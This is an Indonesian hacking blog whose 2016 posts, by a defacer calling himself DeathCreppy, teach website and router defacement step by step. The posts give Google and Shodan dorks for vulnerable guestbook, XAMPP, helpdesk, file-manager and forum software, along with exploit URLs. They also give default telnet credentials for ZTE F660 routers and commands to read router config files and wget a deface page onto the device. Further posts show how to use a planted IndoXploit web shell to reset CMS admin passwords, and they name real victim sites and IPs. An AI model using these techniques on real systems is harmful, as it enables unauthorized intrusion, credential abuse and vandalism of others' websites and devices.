Minggu, 18 September 2016

Deface Website Com_Guestbook Arbitrary Code Injection

kali ini saya DeathCreppy ingin sharing ilmu ^-^ oke kali ini deface web Com_Guestbook Arbitrary Code Injection

udah selesai kan coli nya :D oke langsung aja kita ke tahap selanjut nya :v
[!]DeathCreppy[!]


Dork nya : inurl:option=com_guestbook                 
                  inurl:option=com_guestbook site:.com

Exploitation : kocok.in/[path-CMS]/index.php?option=com_guestbook 
                        kocok.in/index.php?option=com_guestbook 

selanjutnya kalian search dorknya ke google  dulu :v  
udah nemu ? oke pertama2 

Klik Add Comment

isi kolom Your Name, Your Email, URL, Title sembarangan aja trus pada kolom komentar nya di isi script jahat + script depesan kalian
Jika Sudah Oke Klik Save Comment seperti gambar di bawah ini : 


Jika muncul seperti ini berarti berhasil cukk yeayyy :D



hahaha gimana ? gampang sekali kan :D
Numpang Nitip Nick & Team Yahh ^-^
DeathCreppy
Jones Unlimited Edition

Kamis, 15 September 2016

Deface Dengan Router ZTE F660

Assalamualaikum Wr.wb ^-^ DeathCreppy & AnonCyber403 Kali Ingin Share Deface Dengan Router ZTE F660 Langsung Saja ^-^ Follow Me ><
DeathCreppy

Ane gak jago ngebait yang panjang.
Langsung aja ya gan.
Siapkan alat tempur agan terlebih dahulu , simple kok , Download of ZOC7 for Windows , nih http://www.emtec.com/cgi-local/download.cgi?what=ZOC7+%28Windows%29&link=zoc%2Fzoc7091.exe&ext=html

1. Dorking target agan di http://shodan.io 



2. Pilih salah satu target


3. Coba buka di browser dulu IP nya


4. Done , sekarang buka ZOC7nya dan masukin IP target


5. ane menggunakan port 1023 , port default biasanya port 23 , karna port telnet yang terbuka hanya 1023 , jadi saya pake port 1023
6. Tekan Open , Tunggu bentar , connect , masukin username login dan password , user:rootpass:Zte521


7. Lalu Ketikan cat /userconfig/cfg/db_user_cfg.xml , Nanti Akan Muncul Seperti Yang Bi Bawah Berarti "Vuln" Jika Tidak Silahkan Cari Target Lain ^-^

8. ketikkan cd home/httpd/ , lalu kita buat lah file deface dengan perintah wget  http://gununggedekel.tasikmalayakota.go.id/ 
http://gununggedekel.tasikmalayakota.go.id/ Hasil Deface Kalian ^-^  ,
Cara Manggilnya http://181.225.173.105/ Tambahkan /index.html di belakang IP terserbut
http://181.225.173.105/index.html


Atau menggunakan script deface html , ketikkan wget -O DC.html http://gununggedekel.tasikmalayakota.go.id/  ^-^ Cara Manggilnya Sama Seperti Yang Di Atas http://181.225.173.105/dc.html 


8. Done , selamat anda sudah jadi hacker , beritahukan adik, kakak, ayah , ibu , tetangga dekat , sanak keluarga, teman temanmu , jika anda sudah jadi Hacker :3 :v 

oh ya , jangan lupa ane nitip nick "DeathCreppy" dan Temen Ane AnonCyber403 gitu aja :)


Wassalamualaikum wr.wb


Minggu, 11 September 2016

Deface Teknik Xampp Local Write Access

[!]DeathCreppy[!]

Hallo All ^-^  :v
Welcome Back >< DeathCreppy

Kali Ini Saya Mau Berbagi Method.
Nah Method Ini Kebanyakan Yang Vuln Dan Juga Banyak Yang Gak Vuln :v ><

Kebanyakan Bancot Ah   :v

Dork :
   inurl:/xampp/lang.php
   inurl:/security/lang.php
   inurl:/xampp/splash.php
   inurl:xampp/index.php intitle:XAMPP


Exploit :
   localhost /xampp/lang.php?Hacked_By_DeathCreppy
   localhost /security/lang.php?Hacked_By_DeathCreppy


Note : /lang.php?Hacked_By_DeathCreppy   <=   Nick Saya Bisa Di Ganti Dengan Nick Kalian.

Oke Tahap Selanjutnya   ;)

Tidak Semua Web Vuln!

1. Cari Dulu Web'nya Gan >,< 

2. Masukan Exploit'nya , Seperti Di Gambar Di Bawah Ini.



3. Nah begituh ,, Setelah Itu Enter Aja Deh ,,, Kalo Misalkan Ada Error Berarti Itu Vuln Alias Udah Write Acces Ke Lang.tmp
Begini Pesan Error'nya.

Kalo Nggak Error Coba Cek Dulu Hasil'nya Siapa Tau Vuln   ;)
Biasa'nya Sih Kyk Gituh...
4. Nah Langsung Dah Di Cek!
localhost /xampp/lang.tmp
localhost /security/lang.tmp


Mudahkan ? Silahkan Di Coba   ;)
Nitip Nick & Team Yeah gan ^-^ ><
DeathCreppy | Jones Unlimited Edition
Terima Kasih.

Jumat, 02 September 2016

Deface Website Dengan Shell Indoxploit File Upload 1 DIR

Selamat Siang Gan ^-^ Kali Ini Saya Akan Share Ilmu Sedikit >v< Buat Gan" sekalian ... Kali ini Saya DeathCreppy Ft AnonCyber403 ingin Share Deface Website Dengan Shell Indoxploit File Upload  Pada Ingin Tahu ?? Langsung Saya KTP :v >v<
[!]DeathCreppy[!]

Nahh Pertama-pertama kita masuk website yang sudah d tanamin dengan shell indoxploit
 Kalau Sudah Masuk ^-^ Klick "Config" Lalu Langsung Klick "Jumping" Untuk Melihat website yang vuln 1 DIR dri website Yang Gan Deface Nahh Contohnya liat d bwah ^-^
 Kalau Sudah Tanpa Basabasi kita Klik Kanan /home/dispenda/public_html Kalau Di sblahnya adalahh website aslinya  tersebut ^-^ ,Nahh Nanti Akan Menuju Ke Halaman public yang kita klik kanan tadi,   Liat d bwah :) 
 Nahh Dsini Mencari celah web vuln untuk Upload File Script kita, nahh Yang drwsrwsrwt Berarti bisa sedangkan drwxr-xr-x tidak bsa >v< 
 Nahh Kalau Sudah tau Klik Name File Yang tepat drwsrwsrwt Berwarna Hijau Tadi nnti akan menuju ke tmpat data isi file tersebut
 Kalau sudah dapat data filenya langsung klik "Upload" Di smping "Home" nahh Skrang Upload File Script Gan Sekalian ^-^ ..
Nahhh Gimana ?? Gampangkan ?? Silahkan Di Coba gan ^-^ Nahh Kalau Gitu Boleh Donk Nitip Nick And Team >v<
DeathCreppy
Jones Unlimited Edition
Maaf Kalau Ada Kekurangan Kata Ataupun Kata" yang salahh dalam Artikel Tersbut ^-^ >v< Saya Hanya Seorang Yang Ingin Membagi ilmu saja :) Keep Solid gan >v<
Salam Hangat
DeathCreppy Ft AnonCyber404 ^-^

Kamis, 01 September 2016

Deface Website Dengan Config Auto Edit User Pada Shell Backdoor Indoxploit

[!]DeathCreppy[!]



















Hallo Gan Kembali Lagi Bersama saya DeathCreppy :v :p
Pagi Ini Saya Akan Membagi Ilmu Deface Website Dengan Config Auto Edit User Pada Shell Backdoor Indoxploit Nahh Yang Udah Tau pasti udah pernah lakuinnya :v >v< nahh saya share ini untuk yang belum tau ;) >v< yukk langsung saja Follow me :v okwokw hanya butuh Website Yang Di Tanam Shell Backdoor Indoxploit

Bahan - Bahan :
[-] Website Yang Di Tanam Shell Backdoor Indoxploit
[-] Script Deface
[-] PC / Laptop :v
[-] Auto Fokus :v

STEP BY STEPSiapkan Website Yang Telahh Anda Tanam Shell Indoxploit Buka Website Yang Sudah Di tanam Shellnya
Kalau Sudah Klik Config nanti Kalau Ada Tulisan "Done"  Klik Lalu Akan Muncul ke Halaman idx_config nya
Nahh Kalau Sudah Klik "Auto Edit User" Nahh kalau Sudah Nnti Akan Menuju Ke Halaman Auto Edit User Config , Nahh Disitu Sudah tertera Set User Dan Passwordnya Bisa Anda Ganti User Dan Password Sesuka Hati Anda ^-^ Kalau Sudah Klik "Hajar"

Kalau Sudah Klik Hajar Nnti Akan Muncul Auto Edit User Yang Sudah Di Hajar ^-^
 Nahh Itulahh Hasil Dari Access Yang bisa Digunakan Dalam Auto Edit User Yang Di Hajar..
Beriku ini hasil Yang Dari Auto Edit Usernya

Config => adventuu-Joomla.txt
CMS => Joomla
Sitename => Adventure Quest Nepal
Status => sukses edit user, silakan login dengan user & pass yang baru Nahh Kalau Sudah Mendapatkannya Skrang Kita Menuju Websitenya ^-^ Websitenya Yang Sitename => Adventure Quest Nepal, Nahh Itu Anda Searh ke Google ^-^
Kalau Sudah Menemukan Websitenya Tambahkan /Administrator Di Belakang Website Tersebut
www.testdulu.com/administrator
Setalahh Muncul Seperti Yang Di Atas Masukkan User Dan Passwordnya yang Auto Edit User Tersebut ^-^ Nahh Kalau Saya
User : indoxploit
Password : indoxploit
Nahh kalau Sudah Masuk Ke Dalamnya Yahh terserahh Mau Di Apain :v buat Enak aj >v< :p
Hasilnya ^-^ : http://www.adventurequestnepal.com/images/DC.html
Gimana Mnurut gan ?? puas ? Maaf Yahh kalau Ada Kata" yang salah dan Kurang berkenan di hanti anda saya minta maaf .. saya cman ingin share ilmu doank ^-^
Keep Solid Gan >v<
 Boleh Donk Kalau Cantum Nitip Nick & Team Kalau Mau Pepesnya :v :P
Sebelumnya Makasih Kalau Sudah Cantumkan Nick & Team saya >v<
  DeathCreppy | Jones Unlimited Edition


Senin, 29 Agustus 2016

Deface Dengan Open New Ticket Vulnerability

Haii Gan Selamat Pagie kali Saya DeathCreppy Akan Share Deface Dengan Open New Ticket Vulnerability ,Sepertinya Sudah Mulai Banyak Yang Memakai Method ini, Yupzz Langsung Saja ke KTP ;) 
Jaga Mata Gan :v 

Oke Pertama taulahh ngapain :v >v<

Dork :
- visionhelpdesk intext:Submit ticket - Help Desk Software Powered by Vision Helpdesk - visionhelpdesk intext:/submit/ticket      -intext:choose files here site:go.id

        -inurl:"/helpdesk/new_ticket.php?"
        -intext:Helpdesk site:go.id site 

kembangin Sendiri Selanjutnya gan ^-^ Biar Dapat Bnyak Vuln Search di Google Dorknya Pilih Salah Satu ^-^ kalau Sudah Pilih Salah Satu Websitenya ^-^ Liat Gambar Di bawah ini Dan Isi Data-Data Yang Di perlukan Saja ^-^ >v< Cukup Mudah kan ??
nahh Kalau Sudah di isi Data Tersebut >v< nnti akan Muncul gambar yang di Atas ... tidak usah takut ^-^ klik File Yang Kalian Upload "DC.html"nya sperti d gambar di atas
Nahh Hasilnya Jadi Dehh ,Taaraaa !! >v< Selamat Mencoba Bolehh Donk Kalau Nitip Nick And Team >v< Nick : DeathCreppy Team : Jones Unlimited Edition

Minggu, 21 Agustus 2016

Deface Website Dengan Ajax File Manager

Banyak orang-orang yang melupakan teknik pepes yang satu ini, mungkin mereka pikir target nya kaga fresh atau mereka anggap teknik ini sudah mati karena target nya kaga perawan di notif ?
Notif-Notif dan Notif yang mereka kejar padahal sih santai aja..

Bahan-Bahan :

# Dork :
  1. intitle:"Ajax File Manager" site:au
  2. inurl:/ajaxfilemanager.php intext:"/Root Folder"
  3. inurl:/ajaxfilemanager.php intext:"upload"
  4. inurl:/ajaxfilemanager.php .ac.
  5. intitle:"index of" intext:"ajaxfilemanager.php"
Kembangkan Lagi Dengan Otak Hentai yang kalian miliki !!! :v (Peace !) 
Note : site: boleh di ganti dengan domain atau di hapus
# File txt yang mau di upload
Kalo mau keren pake ASCII aja : klik disini

Step by Step :

1. Sebagai Contoh gw pakai dork yang ke 5. lalu seraching di gugel

2. Setelah sekian lama milih target, gw dapet 1 yang perawan..


3.  Setelah gw klik tuh file ajaxfilemanager.php, gw langsung berubah jadi power ranger pink !!!!

4. Setelah masuk ke Ajax File Manager nya, kalian klik tombol upload di pojok kanan atas..

5. Pilih file .txt kalian...


6. Setelah berhasil upload akan mucul nama file kalian..

7. Akses file nya gmna ?? ini akan sedikit memakan emosi, energi jiwa dan raga, !! persiapkan mental kalian. :v

8. Arahkan Cursor kalian ke gambar icon file yang telah kalian upload.. (liat gambar)


9. Di Pojok kiri bawah mucul lah link file kalian,, tinggal kalian pikir bagaimana akses nya :v
mau di ketik manual boleh.. mau di diemin juga boleh :v

Deface Dengan phUploader Vulnerbility File Upload

Tutorial "Deface Dengan phUploader Vulnerbility File Upload". memang cuma upload file .txt sih tapi lumayan bisa masuk ke beberapa mirror. simak aja dah tutorialnya..


                                       Nitip Nick And Team Yahh Sayang ^-^ :* 
                                       DeathCreppy | Jones Unlimited Edition

Bahan-Bahan :

Dork Google :
# intitle:Powered by phUploader
Kembangkan lagi ya mblo :v

File Text kalian..
Kalo pengen variasi pakai text to ASCII aja cari di gugel.


Step by Step :

1. Dorking lah di gugel seperti biasa.

2. Pilih target yang soleha, rajin sholat, pandai masak :v

3. Setelah terbuka kalian akan langsung masuk ke Form Upload File nya




4. klik browse lalu pilih file text kalian.

5. lalu kalian klik tombol upload, itu kan ada 2 tombol yang kiri biasanya tombol upload



 6. Setelah sukses akan muncul url bokep kalian..



 7. Aksesnya tinggal klik aja Url nya, klo ga bisa di klik, ya Use Your Brain

8. Selesai,, terserah mau di apain setelah itu :v

Deface dengan Teknik Message Board

Lanjut Walking Blog geenggs, wkwk dah lama nih gua gak share Bug and metode Defacenye >.<"
hahaha kalem, Kalii ini kite akan bahas dan Praktek salahsatu celah/bug Message Board Forum.
Kuyy langsung Tutorial Deface dengan Teknik Message Board Forum atau Deface High School

Play with Me , Baby ;*



Dork :
inurl:"/forum.php?forumid="
inurl:"/forum_topic_create.php?"
intext:Welcome to our electronic class yearbook

eXploit:
/forum_topic_create.php?forumid=1

1. Dorking menggunakan Search Engine

2. Pilih target kalian yg ada gambar "Message Board" atau yang bertulisan High School


3.  Pilih new topic (kalo dork yg kedua dah langsung ke new topic itu), atau Langsung masukin bae eXploitnye.

contoh: kocokin.org/forum_topic_create.php?forumid=1

4. isi aja sesuka Lu *ngasal :D (kecuali pass verification isi yang bener)


5. Di attach file, pilih file.txt kalian *karna di Bug ini hanya mengizinkan File .txt tapii untuk kalian yg suka mirrorin web bisa kok di masukin ke notify archive kesayangan Lu wkwk


6. Setelah itu klik cancel ( ya klik post lah)




Shell/File Aksesnya ?

Setelah tadi, Post Topic sukses, kalian akan di alihkan ke halaman berikut nya..
di halaman itu akan ada info topic yang kalian post tadi, di bagian Attached File : namafile.txt kalian klik namafile.txt kalian :D



Mudahkan ^-^ ?
Boleh Donk Nitip Nama & Team ^-^
DeathCreppy | Jones Unlimited Edition <(")


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Defacing gan ~
Sekian dan semoga bermanfaat .. terimakasih
All Right Reserved • 2013 Dark Blue Elucidator V3 • Design By : Dimas Galang Ramadhan